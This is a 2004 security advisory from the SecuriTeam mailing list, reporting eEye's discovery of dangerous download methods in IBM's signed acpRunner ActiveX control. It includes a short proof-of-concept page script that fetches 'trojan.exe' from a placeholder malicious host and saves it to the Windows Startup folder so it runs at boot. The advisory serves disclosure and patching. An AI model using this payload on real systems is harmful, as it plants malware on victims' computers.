Date: 17 Jun 2004 20:23:11 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]Subject: [NT] IBM acpRunner ActiveX Dangerous Methods Vulnerability
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
IBM acpRunner ActiveX Dangerous Methods Vulnerability
------------------------------------------------------------------------
SUMMARY
eEye Digital Security has discovered a security vulnerability in IBM's
signed "acpRunner" ActiveX. Because this application is signed, it might
be presented to users on the web for execution in the name of IBM. If
users trust IBM, they will run this, and their systems will be
compromised. This ActiveX was designed by IBM to be used for an automated
support solution for their PC's. An unknown number of systems already have
this ActiveX on their systems.
The issue is quite simple. ActiveX is a very profound web technology. As a
profound web technology it may be abused. Designers might create an
ActiveX that could perform any function on a user's computer. Microsoft
relies on trust for the security model and warns against making ActiveX
with dangerous capabilities. The responsibility, however, rests with the
creator of the ActiveX, as in any trust model.
In this case, IBM made available methods named such as "DownLoadURL",
"SaveFilePath", and "Download". Almost needless to say, these methods
allow a remote attacker to have a victim system silently download the file
of their choosing into the location of their choosing. By downloading an
executable file to the Startup folder, this malicious executable would be
automatically executed on start up.
DETAILS
Vulnerable Systems:
* acpRunner Activex version 1.2.5.0
|object width="310" height="20"
codebase="https://www-3.ibm.com/pc/support/access/aslibmain/content/AcpC
ontrol.cab" id="runner"
classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3"
data="DATA:application/x-oleobject;BASE64,YayY5W9MTU+Hf/rEnKkfowADAAAKIA
AAEQIAAA==">
|object|
|script|
runner.DownLoadURL = "http://malicioussystem/trojan.exe";
runner.SaveFilePath = "\..\\Start Menu\\Programs\\Startup";
runner.FileSize = 96,857;
runner.FileDate = "01/09/2004 3:33";
runner.DownLoad();
|script|
In the above example, we see the object called utilizing the "object" tag.
The codebase tag is used by the browser to initiate the install of the
ActiveX if it is not already existing on the system. This would bring up
the ActiveX prompt that essentially asks the user if they trust IBM.
Finally, the object is named "runner", so we might reference it later in
script and use its' dangerous methods.
In the script we see we access the dangerous methods of "runner" in a
completely straightforward manner. The "saveFilePath" method uses a local
URL on the user's system that will accurately point to the user's startup
folder. Finally, the method "Download" is called, and a progress meter
shows the Trojan file being downloaded to the exploit folder on the user's
system. At restart, the OS would automatically run the Trojan.
Vendor Status:
IBM has released a patch for this vulnerability. The patch is available at
the following location:
<http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-51860>; http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-51860
ADDITIONAL INFORMATION
The information has been provided by <mailto:dcopley@eEye.com.> Drew
Copley.
The original article can be found at:
<http://www.eeye.com/html/research/advisories/AD20040615A.html>;
http://www.eeye.com/html/research/advisories/AD20040615A.html
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
